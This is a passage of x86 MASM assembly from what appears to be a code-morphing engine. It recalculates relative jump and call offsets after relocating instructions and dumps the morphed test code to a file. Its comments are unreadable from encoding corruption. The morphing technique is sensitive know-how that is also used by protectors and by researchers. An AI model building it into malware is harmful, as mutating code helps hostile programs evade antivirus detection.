; <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; imm32 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [<5B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> + 1]
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
; E9 imm32
|
|||
|
; E8 imm32
|
|||
|
; :)
|
|||
|
@_XXX_imm32_:
|
|||
|
cmp eax, [ecx].dwNewAddress
|
|||
|
jle @_less_or_equal_2
|
|||
|
push eax
|
|||
|
sub eax, [ecx].dwNewAddress
|
|||
|
sub eax, 5
|
|||
|
mov edx, [ecx].dwNewAddress
|
|||
|
mov dword ptr [edx + 1], eax
|
|||
|
pop eax
|
|||
|
jmp @F
|
|||
|
|
|||
|
@_less_or_equal_2:
|
|||
|
push eax
|
|||
|
mov edx, [ecx].dwNewAddress
|
|||
|
sub edx, eax
|
|||
|
neg edx
|
|||
|
sub edx, 5
|
|||
|
mov eax, [ecx].dwNewAddress
|
|||
|
mov dword ptr [eax + 1], edx
|
|||
|
pop eax
|
|||
|
jmp @F
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :)
|
|||
|
add ecx, sizeof _OPCODE
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> dwOldAddress
|
|||
|
cmp [ecx].dwOldAddress, 0
|
|||
|
jne @_loop_2
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
invoke VirtualFree, pOpcodes, NULL, MEM_RELEASE
|
|||
|
|
|||
|
@_exit_:
|
|||
|
|
|||
|
mov eax, dwTotalCodeSize
|
|||
|
ret
|
|||
|
MorphCode endp
|
|||
|
|
|||
|
.data
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|||
|
dwOutputBuffer dd 0
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
dwOutputBufferSize dd 0
|
|||
|
|
|||
|
; <20><><EFBFBD>-<2D><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
|
|||
|
dwBytesWritten dd 0
|
|||
|
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|||
|
szFileName db 'morphed_code_dump_raw.bin',0
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> MessageBoxA
|
|||
|
szComplete db 'Complete! :)', 0
|
|||
|
.code
|
|||
|
|
|||
|
start:
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>-<2D><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
invoke VirtualAlloc, NULL, 1024*1024, MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE
|
|||
|
mov dwOutputBuffer, eax
|
|||
|
|
|||
|
;::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>.....
|
|||
|
invoke MorphCode, offset test_code, dwOutputBuffer
|
|||
|
mov dwOutputBufferSize, eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD>
|
|||
|
invoke CreateFile, offset szFileName, GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, 0
|
|||
|
push eax
|
|||
|
invoke WriteFile, eax, dwOutputBuffer, dwOutputBufferSize, addr dwBytesWritten, NULL
|
|||
|
call CloseHandle
|
|||
|
|
|||
|
;:::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
invoke VirtualFree, dwOutputBuffer, NULL, MEM_RELEASE
|
|||
|
|
|||
|
;:::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :)
|
|||
|
invoke MessageBoxA, 0, offset szComplete, 0, MB_ICONINFORMATION
|
|||
|
|
|||
|
;:::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
xor eax, eax
|
|||
|
ret
|
|||
|
end start
|
|||
|
|
|||
|
; #########################################################################
|